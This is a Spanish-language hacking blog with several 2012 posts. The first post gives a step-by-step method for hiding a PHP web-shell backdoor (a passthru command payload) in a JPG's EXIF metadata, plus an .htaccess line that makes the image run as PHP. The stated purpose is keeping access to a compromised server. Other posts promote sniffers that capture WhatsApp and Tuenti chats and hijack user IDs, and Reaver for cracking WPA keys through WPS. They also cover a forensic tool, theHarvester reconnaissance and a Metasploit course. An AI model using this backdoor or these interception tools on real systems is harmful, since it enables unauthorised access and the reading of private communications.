jueves, 19 de abril de 2012

Ocultando codigo PHP en los metadatos de un JPG

Resulta sencillo usar los metadatos EXIF de una imagen JPEG para ocultar código PHP, por ejemplo para dejar un backdoor en la imagen de nuestro avatar en un servidor ya comprometido.


Existen varias herramientas para manipular los metadatos EXIF. Entre todos ellos una de las mejores herramientas para esto es jhead. Para empezar seleccionamos nuestra imagen JPG y miramos sus metadatos con jhead:

C:\>jhead h33z.jpg
File name    : h33z.jpg
File size    : 71384 bytes
File date    : 2012:04:17 14:31:40
Resolution   : 492 x 369
Para insertar nuestro código PHP introducimos:

C:\>jhead -ce h33z.jpg

A continuación se introduce el código PHP que queramos ocultar como por ejemplo:

  • "<?php passthru($_POST['cmd']); __halt_compiler();" -> El cual nos permite ejecutar un comando a la maquina con peticiones POST gracias a la funcion passthru.
Una vez que hemos ocultado el código en la imagen, tendremos que forzar que el servidor web maneje un fichero jpg como si fuera un fichero php. Para ello añadiremos AddType en el fichero .htaccess del directorio de las imágenes. Como ejemplo:

C:\>echo AddType application/x-httpd-php .jpg >> d:\htdocs\server\images\.htaccess

Una vez hecho esto tendremos nuestra imagen ejecutando el código PHP sin problemas.
Esta técnica serviría en un servidor ya comprometido en el cual pudiéramos modificar el fichero .htaccess para que  nuestro JPG ejecutara código.

Enlace de descarga jhead: http://www.sentex.net/~mwandel/jhead/

martes, 17 de abril de 2012

[Analisis forense] RadioGraphy 1.0



RadioGraphy es un programa muy util a la hora de realizar un analisis forense de cualquier ordenador ya que nos permite deducir mediante la información que obtiene si ese equipo esta comprometido o no, como su nombre indica, intenta 'radiografiar' el sistema y obtener la mayor cantidad de datos relevantes posibles como los siguientes:

  • Las claves del registro asociadas al auto-arranque de procesos
  • Las claves del registro asociadas a la configuración de IE
  • Las cuentas de usuario del sistema
  • Los ficheros en directorios 'startup'
  • Los servicios del sistema
  • El contenido del fichero 'hosts'
  • Los 'task' del scheduler de windows
  • Los drivers o módulos cargados en el Kernel de Windows
  • Carpetas compartidas por NetBios
  • Ventanas ocultas (cmd y IE)
  • La lista de procesos activos en el sistema y el path del ejecutable
  • Información relacionada con la red (puertos abiertos, conexiones, etc)
El programa dispone de una característica que cuando encuentra un binario, ya sea un proceso en ejecución o un binario asociado a una clave de registro / task, comprueba si su hash ha sido identificado como sospechoso.

También esta integrado 'WinUnhide' para que realice un test de integridad de procesos en búsqueda de procesos ocultos.

La herramienta cuenta con una versión por línea de comandos y otra en GUI.


Pagina del proyecto y descarga: 


sábado, 25 de febrero de 2012

Sniffers para Whatsapp y Tuenti Chat

Aquí os dejo dos herramientas mas o menos recientes que actúan como sniffer para captar los datos enviados por estas dos aplicaciones ya que utilizan el mismo protocolo XMPP (una tecnología de comunicación en tiempo real muy potente y utilizada actualmente) y envían todo bajo texto plano...


Tuenti Chat - Tuenti Sniffer

El chat de tuenti usa el protocolo XMPP, una potente y actual tecnología de comunicación en tiempo real muy extendida y usada en WhatsApp (aunque este usa una modificación de xmpp realmente). Cuando nos conectamos, tuenti asigna de forma aleatoria un servidor situado de 1 a 9 quedando por ejemplo xmpp1.tuenti.com.

Los mensajes enviados no van en cifrados, de modo que cualquier persona puede leerlos, obtener el userid que corresponde a que personas envían los mensajes y a que personas los reciben, y más.

Tuenti Sniffer es capaz de leer las conversaciones de tuenti que pasen por la red local.
Y es capaz también de suplantar o robar su ID y capturar los datos enviados durante la conversación en el chat de tuenti.

-Enlace para la descarga: 
(*es necesario tener instalado Java 6 JRE y la librería JPCap 0.7)



Whatsapp - Whatsapp Sniffer

Whatsapp es un servicio de mensajería instantánea disponible para cualquier smartphone actual y que usa el protocolo xmpp para la transmisión de datos. Whatsapp tiene como destino el puerto 443(HTTPS) aunque todo viaja bajo texto plano. Los datos de XMPP son enviados a bin-short.whatsapp.net bajo el puerto 5222.

WhatsAppSniffer que muestra en consola todas las conversaciones, identificadores y demás que pasan por la red cuando se está usando whatsapp. Una forma mucho mas cómoda y fácil de obtener estos datos que usando otros sniffers como wireshark.





martes, 21 de febrero de 2012

Reaver: herramienta para hackear redes wifi protegidas con WEP y WPA/WPA2 PSK mediante WPS (WiFi Protected Setup)

Hay muchas herramientas y formas de crackear redes Wifi, pero una de las formas mas efectivas contra redes WPA/WPA 2 es utilizando este programa que aprovecha la característica WPS (WiFi Protected Setup) la cual permite a los usuarios introducir un PIN de 8 dígitos para conectarse a una red segura sin tener que introducir una contraseña. Reaver implementa un ataque de fuerza bruta contra el WPS a fin de recuperar contraseñas WPA/WPA2 obteniendo el PIN para luego extraer el PSK. Reaver ha sido diseñado para ser un ataque sólido y práctico contra la WPS, y ha sido probado contra una amplia variedad de puntos de acceso e implementaciones del WPS. 

En promedio con Reaver se tendrá acceso a WPA/WPA2 en unas 4 a 10 horas, dependiendo de la de la señal Wifi. También hay que destacar que el 95% de los routers traen por defecto activado el WPS.

 -Video de demostración con Reaver:

- Mas información sobre WPS:
 http://sviehb.files.wordpress.com/2011/12/viehboeck_wps.pdf

- Descarga:
  http://code.google.com/p/reaver-wps/

martes, 31 de enero de 2012

The harvester: herramienta para recabar información

The harvester es una herramienta para conseguir informacion sobre emails, subdominios, hosts, nombres de empleados, puertos abiertos, banners... desde fuentes publicas como son los moteres de busqueda, servidores PGP y la base de datos de SHODAN.

Es una herramienta muy sencilla pero realmente efectiva.

Las fuentes de donde coge la informacion son:
- Google
- Perfiles de Google
- Bing
- PGP Servers
                                                        - Linkedin
                                                        - Exalead

Nuevas características

     -Intervalos de tiempo entre las solicitudes
     -XML y HTML como resultados de exportación
     -Buscar un dominio en todas las fuentes
     -Verificador de host virtual
     -Shodan base de datos integrada
     -Enumeración de activos (enumeración DNS, las búsquedas de DNS inversa, DNS expansión TLD)
     -Gráfica con las estadísticas básicas


- Ejemplo de uso:
 
./theharvester.py -d microsoft.com -l 200 -b google
  
-b = fuente de datos (pgp, google, linkedin, all...)
-l = numero de resultados para consultar
-d = dominio sobre el que queremos hacer la consulta
 
 
Descarga  
theHarvester 
 


viernes, 27 de enero de 2012

Curso completo sobre Metasploit Framework


Desde offensive-security.com nos traen este completo curso sobre Metasploit llamado metaspoit unleashed y que abarca muchos aspectos, algunos son básicos que debes tener en cuenta a la hora de ejecutar Metasploit, como los requerimientos de tu maquina, pasando por su instalación, hasta tocar temas como la interacción con metasploit, como programar sobre ella y como ejecutar tu propio exploit programado con este framework.